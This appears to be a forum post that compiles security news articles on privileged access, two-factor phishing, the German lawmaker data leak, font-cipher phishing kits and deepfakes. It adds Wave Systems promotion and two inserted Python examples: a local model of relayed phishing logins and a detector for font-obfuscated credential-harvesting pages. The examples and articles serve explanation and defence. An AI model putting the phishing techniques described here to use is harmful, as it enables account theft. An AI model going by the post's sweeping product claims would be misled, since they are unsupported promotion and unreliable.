Is Privileged Access Management still a pain?
https://www.helpnetsecurity.com/2019/01/08/privileged-access-management/
Every week seems to bring the story of a new customer data breach, but regardless of the individual details, the majority of incidents have one trait in common. The chances are high that the breach was made possible through the compromise of privileged accounts and passwords, usually acquired through social engineering via phishing emails.
Once credentials have been stolen, unauthorised access can often go undetected for weeks or even months at a time, enabling the intruder to undertake a huge level of data exfiltration or lay the foundations for an even greater attack. One of the most dangerous outcomes is for the attacker to escalate their activities and gain access to a privileged account.
What makes a privileged account so important?
Commonly also called superusers, privileged accounts are one of the fundamental building blocks of the IT environment, used by humans, applications and services to run tasks requiring elevated permissions. Accordingly, privileged accounts have many advanced powers and permissions, including creating and modifying other user accounts, unrestricted remote access to all machines on the network, and retrieving sensitive data. They can even make significant changes to the network infrastructure itself.
Gaining control of a privileged account is a huge coup for a cybercriminal as these powers can be used to facilitate many different malicious actions. Armed with superuser credentials, attackers can bypass normal security controls to access sensitive data and install malware anywhere on the network with impunity. They can also disguise their activity by erasing audit trails and destroying evidence, greatly increasing their potential dwell time and confounding investigations by the security team.
The ability to protect superuser accounts from being compromised can make the difference between a minor network intrusion and a breach that devastates the organisation. However, despite their importance and the threat they pose in the wrong hands, many IT users are careless with privileged accounts. Even users who have access to these accounts as part of their role may not fully appreciate their power and how dangerous their misuse can be.
Being equipped with a Privileged Access Management (PAM) solution is one of the best ways to keep privileged accounts under control and well-protected. These tools make it much easier to govern access to privileged accounts and can be used to monitor and limit active sessions to prevent misuse. However, some IT teams have come to fear PAM tools, considering them expensive, resource heavy, and overly complicated.
Lingering disrepute
Much of the maligned reputation around PAM stems from experiences with legacy software. In many cases, previous generations of PAM solutions were overly complex and difficult to implement. The installation process could require the use of specialised professionals and could sometimes take several months or even years to fully complete – or perhaps remain unfinished indefinitely. The combination of specialists and lengthy implementation times meant that many IT teams decided the cost of PAM simply wasn’t worth it.
It should be noted that these experiences often come from a very different time in cyber security. For many years, the best way to protect sensitive information and assets was to build a fence around them. With all data flowing in and out through a single access point, the traditional perimeter could keep out the majority of threats. Under this set up, IT teams could more readily assume that their networks would be protected without the use of PAM.
Today however, the perimeter approach is no longer effective and is easily circumvented if attackers can gain access to login credentials. Remote working practices have also greatly increased the surface area for attack and made it even easier to slip through the perimeter. Likewise, traditional security tools don’t flag when someone is using legitimate resources for inappropriate activities, making them ill-suited for this new model.
Starting a fresh PAM journey
Employing PAM capabilities is essential if an organisation is to keep its privileged accounts from falling into the wrong hands, and IT teams still put off by past experiences can now expect a positive PAM deployment: it is no longer costly or complex and does not require specialised skills.
PAM is an important priority for all organisations and any previous challenges can be overcome by beginning with thorough planning and assessment. The main priority is to identify all accounts with elevated powers and ensure there are clear policies about proper usage and responsibilities. The account audit required to get started with PAM can help demonstrate compliance with the GDPR, PCI, ISO and other regulations and can also directly help to turn up evidence of unusual behaviour that indicates a breach or credential misuse.
Establishing a solid foundation will make the process of managing and securing privileged accounts much more scalable and flexible, helping organisations avoid the lengthy and expensive implementation processes of old. The rapidly expanding market now includes many different options for PAM solutions that can be easily installed out-of-the-box without the need for specialised skills and expertise. For example, PAM-as-a-Service can now easily be consumed from the cloud – securing privileged access to critical assets without the need for implementation.
The right PAM solution will leave organisations in a much stronger position to protect their privileged accounts from cyber criminals who have adopted credential theft and escalation as their main modus operandi. With proper planning and a flexible and scalable approach, companies can reap the benefits without the implementation headaches of legacy solutions.
=================================================================
If an IT administrator is going to protect privileged access why not protect all access? How would the Privileged Access Management (PAM) protect accounts that are nefariously upgraded to privileged access? See link below for such an incident. Wave VSC 2.0 - Better security at less than half the cost!
=================================================================
Researcher finds simple way of backdooring Windows PCs and nobody notices for ten months
https://www.zdnet.com/article/researcher-finds-simple-way-of-backdooring-windows-pcs-and-nobody-notices-for-ten-months/
"RID Hijacking" technique lets hackers assign admin rights to guest and other low-level accounts
https://investorshub.advfn.com/boards/read_msg.aspx?message_id=144344217
===============================================================
Wave VSC 2.0 would protect privileged and low-level accounts and prevent the low-level accounts from nefariously being upgraded to privileged. imo. See above ihub link for more information.
================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
Boards need to be active partners in cyber defence
https://www.computerweekly.com/news/252455381/Boards-need-to-be-active-partners-in-cyber-defence
Board members must be active governance partners in collaborative cyber defence, says US regional information sharing and analysis organization
Defending against cyber attackers requires collaboration across organisational functions and between organisations, according to a report by the Advanced Cyber Security Center (ACSC).
The report urged boards to adopt a comprehensive and dynamic understanding of their organisations’ cyber security responsibilities and to maintain regular direct access to CISOs and risk officers in conjunction with CIOs and other executives.
The report, based on a survey of 20 ACSC member CISOs and CIOs from diverse organisations and interviews with external experts, was intended to provide a perspective on the current state of board engagement in cyber security.
It also described the benefits and challenges of maturing board engagement and included recommendations for model board engagement.
The New England-based ACSC is a federally registered regional information sharing and analysis organisation (ISAO) aimed at encouraging cross-sector collaboration and promoting effective practices to help organisations strengthen their cyber defences.
According to the report, in most cases the board partnership with management is still “at an early stage” or in a “maturing phase” in its ability to provide strategic guidance and help guide management’s strategic risk judgements.
Because most boards do not yet have sufficient expertise in technology or cyber security to serve as strategic thought partners on cyber risk, the report recommended that they should recruit board members with broad digital or technology expertise, develop an annual curriculum of cyber briefings, provide ongoing training and use third-party assessments.
A key finding of the survey was that placing cyber security in an organisational silo at the operational or board level makes it difficult to develop a comprehensive and nuanced understanding of cyber security’s impact on business risk.
Boards generally spend one meeting a year on cyber security, delegating responsibility to the risk or audit committee, leaving the full board with little time to develop expertise on the cyber risks, the survey showed.
The report recommended that CISOs and CIOs should present jointly at board meetings to provide a comprehensive view of digital strategies and security.
“Boards as a whole should review cyber security more consistently as a business risk and the risk or audit committee should be used for more frequent (at least quarterly) cyber reviews,” the report said.
The survey showed that as cyber security budgets continue to grow, two issues have arisen. The first is “budget fatigue” and the second is that cyber security investments are seen as “separate” from IT investments and so do not represent a complete picture of security spend.
In terms of overseeing cyber security and digital transformation budgets, the report recommended that boards should present digital transformation budgets as a whole, with cyber security investments as an element of overall IT-related decisions about where to invest in growth and security.
Boards and management require cyber risk frameworks that provide a means to make informed risk judgements, the report said, noting that cyber security has not yet developed the standard risk frameworks that financial and audit risk functions have.
In the light of this fact, the report recommended that boards should prioritise and support senior management’s development of a new generation of outcome-based cyber risk management frameworks. “In the meantime, executives should use only a few operational metrics with boards,” it said.
Michael Figueroa, executive director of the ACSC, said the report examines the reality that, for the most part, boards are not in a position to provide strategic guidance on cyber risk.
“In particular, the report has identified a need for a risk standard, much like those frameworks that financial and audit risk functions have refined over decades, that would help guide decision-making and operations as they relate to cyber risk management,” he said.
=================================================================
If board members and CISOs were asked to read the Wave Alternative and if the CISOs could be asked to compare their cyberdefenses with Wave VSC 2.0, Wave ERAS, Wave SED management and Wave Endpoint Monitor, they could very well see the light to a better cyber future!! imo.
==================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
https://www.wavesys.com/products/wave-self-encrypting-drive-management
https://www.wavesys.com/products/wave-endpoint-monitor
================================================================
https://www.wavesys.com/wave-alternative
The IT perimeter is gone
With tablets, smartphones, and cloud applications, your employees can access sensitive data anytime, from anywhere. Indeed, around 70 percent of security breaches and data thefts are inside jobs. Meanwhile, the hackers only get better: advanced persistent threats (APTs) appear as normal traffic, and malware can go unnoticed for weeks.
It’s a new world, one without borders. Yet most organizations are still trying to protect their data with the same old firewalls and antivirus software. It’s not working. We refer you to the headline-making breach of the week.
You have to start with the device
Wave has an alternative: security that’s built into each and every device.
We’re talking about hardware: self-encrypting drives (SEDs), which protect data when a device is stolen or lost, and trusted platform modules (TPMs), or embedded security chips. Both go in at the factory, and increasingly, both are standard. They make it possible for you to monitor and control each individual device and its data, no matter where it is. But you need software to turn on and manage your SEDs and TPMs. Wave makes that software.
We’ve been refining comprehensive, centralized management of hardware-based security longer than anyone else. More than that, we’ve shaped the field as a founding member of the Trusted Computing Group, the not-for-profit that develops and promotes industry standards for the hardware.
Security that’s confirmed, not assumed
With Wave, you’ll know that you’re secure. Because we start with the individual devices, you get a broad, deep view of your network. You can see exactly who’s on it, with what devices and what apps, at any given time. Just for example, if Bob goes home and tries to log onto Facebook with the company laptop, Wave can stop him.
A big piece of this heightened security is device authentication. Traditional two-factor authentication requires what amounts to two user IDs. But by using the TPMs inside your devices, Wave can confirm the identity of not only users, but also the devices they’re on. Combine that with fast, enforced encryption of sensitive data via your SEDs—all easily managed with Wave software—and your data is protected from the full range of modern risks: device theft, missent emails, flash drives, portable hot spots … even (and no one else can say this) hardware keyloggers. Not to mention Bob.
Do we need to say that with Wave, compliance is no problem?
Start closing your security gaps today, with what you’ve got
You might be surprised to hear that 90 percent or more of your computers probably already have TPMs. Mobile devices are catching up fast. SEDs are newer, but you probably have a bunch of those too. Machines that don’t have them can often be outfitted at little to no extra cost. So you’ve got some or all of the hardware. All you need to do is turn it on with Wave.
It’s almost as easy as it sounds. TPMs and SEDs are built to open, vendor-neutral industry standards, and so are Wave solutions. That means Wave works on your existing mix of hardware, across platforms, and will evolve with you. It’s part of what makes the Wave alternative not only more secure, but also simpler and cheaper. Total cost of ownership for Wave data protection can be almost half that of a traditional software-based system.
Questions? Read on, or contact our sales department.
'You can't relax': Here's why 2-factor authentication may be hackable
https://www.cnbc.com/2019/01/04/how-secure-is-your-account-two-factor-authentication-may-be-hackable.html
•Cybercriminals can now use a type of phishing to get around two-factor authentication, typically a code sent to your cellphone that is needed to log in, according to cybersecurity firm KnowBe4.
•KnowBe4 used LinkedIn for its demo, but said many other websites are also vulnerable.
•The code for the attack is now public, according to KnowBe4.
In a quest to make online accounts safer, many services now offer two-factor authentication. The system typically sends a code to a user's mobile phone that they need to log in, along with a username and password.
Cybersecurity professionals have advised enabling two-factor to add an extra layer of security — but according to at least one expert, this may not be a silver bullet. Kevin Mitnick, who was once the FBI's most wanted hacker and now helps companies defend themselves, found that two-factor authentication can be vulnerable.
"Just by enabling two-factor authentication, you can't relax…a smart attacker could get access to your account," Mitnick said in an interview with CNBC. He is the chief hacking officer at KnowBe4, a cybersecurity company that trains people to spot phishing, or spoofed emails.
Mitnick told CNBC he found out about the vulnerability when it was posted online for anyone to find.
"The tool to actually pull these attacks off has been made public. So any 13-year-old could download the tool and actually carry out these attacks," he said.
According to Mitnick, the attack begins when a cybercriminal sends an email that looks real, and asks the receiver to click on a link.
Once the user clicks on the link, they are directed to log into the real website, including entering the code sent to their cellphone. Secretly, however, the login went through the hacker's server and they were able to get the session cookie, the expert explained.
"If we can steal the user session cookie, we could become them, and we don't need their username, their password, or their two-factor," Mitnick said.
Mitnick showed CNBC that he was able to enter that code into his browser. "When I hit refresh I'm going to be magically logged into the victim's account," he said.
Mitnick used LinkedIn to demo the attack for CNBC, but said many other websites are also vulnerable. The email he clicked on looked like a real LinkedIn connection request — but actually came from a fake domain, lnked.com. He said most people may not realize the difference.
"It's not LinkedIn that's vulnerable. It's the actual user… It's a security flaw with the human," Mitnick said.
In a statement, Mary-Katharine Juric, a LinkedIn spokesperson, told CNBC that the professional network took Mitnick's demonstration "very seriously," and that LinkedIn has "a number of technical measures in place to protect our members from fraudulent activity including phishing scams."
She added: "When we detect this type of activity, we work to quickly remove it and prevent future re-occurrences. We strongly encourage members to report any messages or postings they believe are scams, and utilize our member help center as a resource to educate and protect themselves from frauds online."
This attack is part of what is known as social engineering, when hackers take advantage of human behavior to get you to do something, like click on a link. Another way to protect yourself is to pay close attention to email you get, even if you use two-factor authentication.
"Social engineering if you do it right can be used to get into almost anything," said Stu Sjouwerman, KnowBe4's CEO.
To protect from attacks like this one, some companies are making tools called security keys.
Instead of sending a code to your cell phone, security keys — which look like a keychain — contain a hardware chip, and use Bluetooth or USB to be the additional factor needed to log into your account. Recently, Google released its own version of the device, which it calls the Titan Security Key.
"The security key stores its own password and requires the site to prove it's legit before releasing the password and getting you signed in," said Mark Risher, Google's director of product management for security and privacy.
"It's not ubiquitous by a long shot but we are encouraged to see more and more sites and apps," he added.
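The proxied login described above, modelled as an added example (not code from the article, KnowBe4 or CNBC): a code-based second factor can be relayed because nothing in it names the site the user is on, while a security key signs over the origin the browser reports, which is what Risher's "requires the site to prove it's legit" amounts to. The per-origin HMAC "signature" and the victim credentials are stand-ins assumed for the model.

```python
import hashlib
import hmac
import json
import secrets

REAL_ORIGIN = "https://www.linkedin.com"   # genuine site named in the article
PHISH_ORIGIN = "https://lnked.com"         # look-alike domain from the demo
VICTIM_PASSWORD = "correct-horse-battery"  # constructed, hypothetical
VICTIM_OTP = "493817"                      # constructed, hypothetical


class CodeBasedServer:
    """Accepts a password plus the code texted to the phone and hands back a
    session cookie. Nothing in the exchange says which site the user typed
    into, so a relaying proxy looks exactly like the user's own browser."""

    def __init__(self):
        self.sessions = set()

    def login(self, password, otp):
        if password != VICTIM_PASSWORD or otp != VICTIM_OTP:
            return None
        cookie = secrets.token_hex(16)
        self.sessions.add(cookie)
        return cookie


def proxy_phish_code_based():
    """The attack in the article: the victim types password and code into the
    look-alike page, the proxy forwards both to the real site and keeps the
    cookie. Returns True when the attacker ends up holding a live session."""
    server = CodeBasedServer()
    relayed_password, relayed_otp = VICTIM_PASSWORD, VICTIM_OTP  # typed at lnked.com
    stolen_cookie = server.login(relayed_password, relayed_otp)
    return stolen_cookie in server.sessions


class SecurityKey:
    """Stand-in authenticator. A real FIDO2 key holds a key pair per site and
    signs with the private key; here one HMAC key per origin plays that role
    (an assumption of this model, not how a real key is built)."""

    def __init__(self):
        self.credentials = {}

    def register(self, origin):
        key = secrets.token_bytes(32)
        self.credentials[origin] = key
        return key  # the server keeps this as the credential's verifier

    def sign(self, browser_origin, challenge):
        # The browser reports the origin it is really connected to; a page
        # served from lnked.com cannot claim to be linkedin.com here.
        key = self.credentials.get(browser_origin)
        if key is None:
            return None  # no credential for this site: the key stays silent
        client_data = json.dumps({"challenge": challenge, "origin": browser_origin}, sort_keys=True)
        sig = hmac.new(key, client_data.encode(), hashlib.sha256).hexdigest()
        return client_data, sig


class SecurityKeyServer:
    """Relying party: issues a one-time challenge, then only accepts signed
    client data that names its own origin and an outstanding challenge."""

    def __init__(self, credential_key):
        self.credential_key = credential_key
        self.pending = set()
        self.sessions = set()

    def begin_login(self):
        challenge = secrets.token_hex(16)
        self.pending.add(challenge)
        return challenge

    def finish_login(self, response):
        if response is None:
            return None  # the key never answered
        client_data, sig = response
        expected = hmac.new(self.credential_key, client_data.encode(), hashlib.sha256).hexdigest()
        if not hmac.compare_digest(sig, expected):
            return None  # forged or tampered
        data = json.loads(client_data)
        # A valid signature is still refused when it was made for another site.
        if data["origin"] != REAL_ORIGIN or data["challenge"] not in self.pending:
            return None
        self.pending.discard(data["challenge"])
        cookie = secrets.token_hex(16)
        self.sessions.add(cookie)
        return cookie


def security_key_login(browser_origin):
    """Same proxy, but the victim uses a security key: the proxy relays the
    genuine challenge, while the browser tells the key where it really is.
    Pass PHISH_ORIGIN for the attack, REAL_ORIGIN for a normal login."""
    key = SecurityKey()
    server = SecurityKeyServer(key.register(REAL_ORIGIN))
    challenge = server.begin_login()  # the proxy fetches this from the real site
    cookie = server.finish_login(key.sign(browser_origin, challenge))
    return cookie in server.sessions
```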
=================================================================
See link below for information on tokens and why the laptop with a TPM (and Wave VSC 2.0) could be better than a security key.
=================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
Get better security at less than half the cost
Passwords are weak. Tokens are expensive. Don’t compromise on security or price.
Wave Virtual Smart Card does anything your physical smart cards and tokens do, but it starts with hardware you already have: the Trusted Platform Module (TPM), a hardware security chip built into the motherboard of most business-class PCs. You may not even know you have it, but once you do, the TPM can be used in a myriad of ways. Wave turns it into a smart card, embedded directly into your laptop.
What can it be used for?
What do you use your smart card for today? With the exception of keying open the door at work, Wave Virtual Smart Card can perform any of the services or applications you rely on your smart card for today. Secure VPN, WiFi, remote desktop, cloud applications – it can all be done with a virtual smart card.
One helpdesk call you'll never get: "I lost my virtual smart card again..."
There are so many ways to lose a token – couch cushions, street drains, curious toddlers. In fact, up to 30% of all tokens are eventually lost. It’s much harder to lose a laptop, and you notice a lot faster when you do.
The user experience with a virtual smart card is simple: he or she logs in with a PIN (authentication factor number one). The TPM (authentication factor number two) then transparently identifies the device to the network and connects the user to all the approved services. It’s one less thing for users to carry around.
What will you do with >50% TCO savings?*
Tokens and smart cards require an additional hardware purchase, plus the time and money to ship to remote users. Use something that’s already in the users’ hands (the TPM), and your acquisition and deployment costs are lower.
Then consider the management savings in not having to replace lost and stolen tokens. That means fewer helpdesk calls, less interruption of user productivity, and fewer acquisition and shipping costs.
When we say “secure”…
…we mean it. Our solution starts with a proven hardware root-of-trust. Multi-factor authentication is an established best-practice for strong authentication: the TPM-based virtual smart card is one factor (something you have) and the user PIN is a second factor (something you know).
*Actual number may vary. Contact us today to receive more details and a free quote.
Key Features:
• Full lifecycle management of virtual smart cards
• Intuitive interface to create (or delete) virtual smart cards
• Command line option to create and delete virtual smart cards
• Flexible PIN policies
• Helpdesk-assisted PIN reset and recovery
• Generates reports for compliance
• Integrates with Active Directory
• Supports familiar use cases:
  • Virtual Private Network (VPN)
  • Local logon
  • Remote logon
  • Remote desktop access
  • Intranet/Extranet
  • Cloud applications
Hacker leaks data on Angela Merkel and hundreds of German lawmakers
https://techcrunch.com/2019/01/04/germany-data-breach-lawmakers-leak/?sr_share=twitter&utm_source=tctwreshare
A hacker has targeted and released private data on German chancellor Angela Merkel and other senior German lawmakers and officials.
The data was leaked from a Twitter account, since suspended, and included email addresses, phone numbers, photo IDs and other personal data on hundreds of senior political figures.
According to a government spokesperson, there was no “sensitive” data from the chancellor’s office, but other lawmakers had more personal data stolen. Other portions of the leaked data included Facebook and Twitter passwords. Some had their credit card information stolen, and chat logs and private letters published in the breach.
Germany’s Federal Office for Information Security said in a statement that it was “extensively investigating” the breach, but does not believe there was an attack on the government’s networks.
It’s been reported that the hacker may have obtained passwords to access social media accounts. Often, hackers do this by tricking a phone company into “porting out” a person’s phone number to another SIM card, allowing them to password reset accounts or obtain two-factor codes.
The hacker leaked data on senior lawmakers across the political spectrum, but noticeably absent were accounts for the country’s far-right Alternative for Germany party.
The hack is reminiscent of a data breach involving the Democratic National Committee in 2016, which targeted the Democrats in the U.S. in the months running up to the U.S. presidential election. The U.S. government later attributed the hack to Russia, which prosecutors say tried to influence the election to elect Donald Trump to the White House. The Justice Department brought charges against seven suspects earlier this year for being part of the so-called “Fancy Bear” group of hackers, working on behalf of the Russian government.
Little is known about who is behind the leak of German lawmakers’ data. The German government has not speculated about who — or if a nation state — may have been behind the attack. But the alleged hacker said in a statement linked from their Twitter account that they “operated alone and does not belong to any organization or similar on Twitter.”
According to security experts who’ve seen portions of the data, the hacker spread the stolen information across several sites and mirrors, making it “really hard to take down.”
Germany’s minister for justice Katarina Barley called the breach a “serious attack,” one that aimed to “damage confidence in our democracy and institutions,” according to the BBC.
It’s not the first time that the German parliament has faced security issues. In 2015, attackers stole gigabytes of data on lawmakers, a breach that Germany’s domestic spy agency later accused Russia of being behind.
Russia has repeatedly denied launching cyberattacks.
=================================================================
If Germany and other countries had been using Wave products, events like these wouldn't have happened. imo. Better security at less than half the cost!!
==================================================================
https://www.wavesys.com/wave-alternative
=================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
Phishing Tactic Hides Tracks with Custom Fonts
https://threatpost.com/phishing-custom-fonts/140563/
The phishing campaign is using a new technique to hide the source code of its landing page – and stealing credentials from customers of a major U.S.-based bank.
An insidious phishing method evades detection using a never-before-seen technique that leverages custom fonts to cover its tracks.
Researchers at Proofpoint recently discovered an active credential harvesting phishing scheme. Once a victim has clicked on the initial phishing email, the resulting landing page looks like a login page for a major U.S. bank – but in reality the page is bent on stealing banking customers’ credentials, Chris Dawson, threat intelligence lead at Proofpoint, told Threatpost. The phishing kit uses custom web fonts to obfuscate the source code for the landing page – making it seem harmless.
“While encoded source code and various obfuscation mechanisms have been well documented in phishing kits, this technique appears to be unique for the time being in its use of web fonts to implement the encoding,” researchers at Proofpoint said in a Thursday analysis of the technique.
Upon further analyzing the landing page, researchers were surprised to find that the source code of the page includes unexpectedly encoded display text – even when it has been copied and pasted into a text file.
Behind this trick are Web Open Font Format (WOFF) files, which are web font files created in an open format that delivers webpage fonts. The base64-encoded woff and woff2 files install a substitution cipher.
Essentially the substitution ciphers replace the expected alphabetical letters shown to the victim on the page (“abcdefghi…”) with other letters in the source code.
For potential victims looking at the page, the trick means their browser renders the ciphered text as plaintext – essentially making the true purpose of the landing page harder to detect.
These substitution functions are also identified in the CSS code for the landing page, differing from those used in other phishing kits, which are frequently implemented in JavaScript.
The phishing technique has one other trick up its sleeve: Using the images of the bank’s branding in scalable vector graphics format, so that the logo and its source do not appear in the source code. That sidesteps the process of linking to actual logos and other visual resources, which could potentially be detected by the impersonated brand.
Dawson said that the phishing kit was first observed being used in May 2018 – but it is possible that the kit appeared in the wild earlier. And, it’s still being used, with a number of active domains hosting the kit.
Potential victims as always should be extremely careful about clicking URLs and going directly to bank websites instead of following links.
“This is really just one more way in which threat actors are looking to hide their tracks,” Dawson told us. “Whether that is through a variety of code mechanisms or new novel ways of getting around detection, it’s all just a matter of being more effective.”
=================================================================
Wave VSC 2.0 helps protect against a clever phishing trick like the one in this article even if the phishing landing page is not detected. This is a strong advantage over products that try to detect the phishing. imo.
================================================================
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
Excerpts:
Key Feature:
Token-free, password-free user authentication
We know you’ve dreamt about shredding your list of passwords. Go on and do it.
Strong Security
Protect against phishing, malware and other network security threats by storing authentication credentials in hardware
=================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
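A defender-side check for the font trick described in the Threatpost article above, added here as an example and not code from Proofpoint, Threatpost or Wave. It finds fonts embedded as base64 data: URIs, confirms them by the WOFF/WOFF2 magic bytes, and shows why keyword matching on the raw source fails until the font's character substitution is applied. The page fragment and the glyph map (letters shifted by three) are constructed for the example; a real scanner would recover the mapping from the font's cmap table, for which a font-parsing library such as fontTools can be used.

```python
import base64
import re
import string

# Constructed glyph map standing in for the cmap a kit's WOFF file would
# carry: a character in the source renders as the letter three places
# earlier.  A real mapping would be read out of the font itself.
def _shift(ch, n):
    for alphabet in (string.ascii_lowercase, string.ascii_uppercase):
        if ch in alphabet:
            return alphabet[(alphabet.index(ch) + n) % 26]
    return ch

GLYPH_MAP = {c: _shift(c, -3) for c in string.ascii_letters}   # source -> rendered
_ENCODE = {rendered: src for src, rendered in GLYPH_MAP.items()}  # rendered -> source

def _encode(text):
    """What the kit would have to write into the source to display `text`."""
    return "".join(_ENCODE.get(c, c) for c in text)

# Constructed landing-page fragment: an inline base64 WOFF (only the magic
# bytes plus zero padding, not a real font) and form labels scrambled so
# that the source shows "Vljq lq" where the user sees "Sign in".
FAKE_WOFF_B64 = base64.b64encode(b"wOFF" + bytes(8)).decode()
SAMPLE_HTML = (
    "<style>@font-face{font-family:'k1';src:url(data:font/woff;base64,"
    + FAKE_WOFF_B64 + ") format('woff');} body{font-family:'k1';}</style>\n"
    "<form action=\"/auth\"><label>" + _encode("Sign in") + "</label>"
    "<input name=\"u\"><label>" + _encode("Password") + "</label>"
    "<input type=\"password\" name=\"p\"></form>"
)

DATA_URI = re.compile(r"url\(\s*['\"]?data:([\w/+.-]+);base64,([A-Za-z0-9+/=]+)")
TAG = re.compile(r"<[^>]+>")
KEYWORDS = ("sign in", "password", "log in", "account")

def find_inline_fonts(html):
    """Return (mime type, decoded bytes) for every base64 data: URI used as a font source."""
    return [(mime, base64.b64decode(b64)) for mime, b64 in DATA_URI.findall(html)]

def is_woff(blob):
    """WOFF 1.0 files start with 'wOFF', WOFF 2.0 files with 'wOF2'."""
    return blob[:4] in (b"wOFF", b"wOF2")

def render_as_user_sees(text, glyph_map):
    """Apply the font's character substitution, i.e. what the browser displays."""
    return "".join(glyph_map.get(c, c) for c in text)

def scan_landing_page(html, glyph_map):
    """Count inline WOFF fonts and compare keyword hits before and after
    applying the substitution: a page with no hits in the raw text but hits
    once rendered is using the font as a cipher."""
    fonts = find_inline_fonts(html)
    visible = TAG.sub(" ", html)
    raw_text = visible.lower()
    rendered = render_as_user_sees(visible, glyph_map).lower()
    return {
        "inline_woff_fonts": sum(1 for _, blob in fonts if is_woff(blob)),
        "raw_keyword_hits": [k for k in KEYWORDS if k in raw_text],
        "rendered_keyword_hits": [k for k in KEYWORDS if k in rendered],
    }
```

The point of the comparison is that an inline WOFF font is itself only a weak signal (legitimate pages embed fonts too); the combination of an embedded font with a substitution cmap and login vocabulary that appears only after rendering is what separates this kit from ordinary pages.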
Toxic Data: How 'Deepfakes' Threaten Cybersecurity
https://www.darkreading.com/application-security/toxic-data-how-deepfakes-threaten-cybersecurity-/a/d-id/1333538?_mc=KJH-Twitter-2018-12
The joining of 'deep learning' and 'fake news' makes it possible to create audio and video of real people saying words they never spoke or things they never did.
"Fake news" is one of the most widely used phrases of our times. Never has there been such focus on the importance of being able to trust and validate the authenticity of shared information. But its lesser-understood counterpart, "deepfake," poses a much more insidious threat to the cybersecurity landscape — far more dangerous than a simple hack or data breach.
Deepfake activity was mostly limited to the artificial intelligence (AI) research community until late 2017, when a Reddit user who went by "Deepfakes" — a portmanteau of "deep learning" and "fake" — started posting digitally altered pornographic videos. This machine learning technique makes it possible to create audio and video of real people saying and doing things they never said or did. But Buzzfeed brought more visibility to Deepfakes and the ability to digitally manipulate content when it created a video that supposedly showed President Barack Obama mocking Donald Trump. In reality, deepfake technology had been used to superimpose President Obama's face onto footage of Jordan Peele, the Hollywood filmmaker.
This is just one example of a new wave of attacks that are growing quickly. They have the potential to cause significant harm to society overall and to organizations within the private and public sectors because they are hard to detect and equally hard to disprove.
The ability to manipulate content in such unprecedented ways generates a fundamental trust problem for consumers and brands, for decision makers and politicians, and for all media as information providers. The emerging era of AI and deep learning technologies will make the creation of deepfakes easier and more "realistic," to an extent where a new perceived reality is created. As a result, the potential to undermine trust and spread misinformation increases like never before.
To date, the industry has been focused on the unauthorized access of data. But the motivation behind and the anatomy of an attack has changed. Instead of stealing information or holding it ransom, a new breed of hackers now attempts to modify data while leaving it in place.
One study from Sonatype, a provider of DevOps-native tools, predicts that, by 2020, 50% of organizations will have suffered damage caused by fraudulent data and software. Companies today must safeguard the chain of custody for every digital asset in order to detect and deter data tampering.
The True Cost of Data Manipulation
There are many scenarios in which altered data can serve cybercriminals better than stolen information. One is financial gain: A competitor could tamper with financial account databases using a simple attack to multiply all the company's account receivables by a small random number. While a seemingly small variability in the data could go unnoticed by a casual observer, it could completely sabotage earnings reporting, which would ruin the company's relationship with its customers, partners, and investors.
Another motivation is changing perception. Nation-states could intercept news reports that are coming from an event and change those reports before they reach their destination. Intrusions that undercut data integrity have the potential to be a powerful arm of propaganda and misinformation by foreign governments.
Data tampering can also have a very real effect on the lives of individuals, especially within the healthcare and pharmaceutical industries. Attackers could alter information about the medications that patients are prescribed, instructions on how and when to take them, or records detailing allergies.
What do organizations need to consider to ensure that their digital assets remain safe from tampering? First, software developers must focus on building trust into every product, process, and transaction by looking more deeply into the enterprise systems and processes that store and exchange data. In the same way that data is backed up, mirrored, or encrypted, it continually needs to be validated to ensure its authenticity. This is especially critical if that data is being used by AI or machine learning applications to run simulations, to interact with consumers or partners, or for mission-critical decision-making and business operations.
The consequences of deepfake attacks are too large to ignore. It's no longer enough to install and maintain security systems in order to know that digital assets have been hacked and potentially stolen. The recent hacks on Marriott and Quora are the latest on the growing list of companies that have had their consumer data exposed. Now, companies also need to be able to validate the authenticity of their data, processes, and transactions.
If they can't, it's toxic.
=================================================================
Some more reasons to have organizations' sensitive information protected by Wave VSC 2.0 and Wave SED Management. Using the Wave Alternative could save organizations a lot of money and headaches.
=================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
https://www.wavesys.com/products/wave-self-encrypting-drive-management
==================================================================
https://www.wavesys.com/wave-alternative
The IT perimeter is gone
With tablets, smartphones, and cloud applications, your employees can access sensitive data anytime, from anywhere. Indeed, around 70 percent of security breaches and data thefts are inside jobs. Meanwhile, the hackers only get better: advanced persistent threats (APTs) appear as normal traffic, and malware can go unnoticed for weeks.
It’s a new world, one without borders. Yet most organizations are still trying to protect their data with the same old firewalls and antivirus software. It’s not working. We refer you to the headline-making breach of the week.
You have to start with the device
Wave has an alternative: security that’s built into each and every device.
We’re talking about hardware: self-encrypting drives (SEDs), which protect data when a device is stolen or lost, and trusted platform modules (TPMs), or embedded security chips. Both go in at the factory, and increasingly, both are standard. They make it possible for you to monitor and control each individual device and its data, no matter where it is. But you need software to turn on and manage your SEDs and TPMs. Wave makes that software.
We’ve been refining comprehensive, centralized management of hardware-based security longer than anyone else. More than that, we’ve shaped the field as a founding member of the Trusted Computing Group, the not-for-profit that develops and promotes industry standards for the hardware.
Security that’s confirmed, not assumed
With Wave, you’ll know that you’re secure. Because we start with the individual devices, you get a broad, deep view of your network. You can see exactly who’s on it, with what devices and what apps, at any given time. Just for example, if Bob goes home and tries to log onto Facebook with the company laptop, Wave can stop him.
A big piece of this heightened security is device authentication. Traditional two-factor authentication requires what amounts to two user IDs. But by using the TPMs inside your devices, Wave can confirm the identity of not only users, but also the devices they’re on. Combine that with fast, enforced encryption of sensitive data via your SEDs—all easily managed with Wave software—and your data is protected from the full range of modern risks: device theft, missent emails, flash drives, portable hot spots … even (and no one else can say this) hardware keyloggers. Not to mention Bob.
Do we need to say that with Wave, compliance is no problem?
Start closing your security gaps today, with what you’ve got
You might be surprised to hear that 90 percent or more of your computers probably already have TPMs. Mobile devices are catching up fast. SEDs are newer, but you probably have a bunch of those too. Machines that don’t have them can often be outfitted at little to no extra cost. So you’ve got some or all of the hardware. All you need to do is turn it on with Wave.
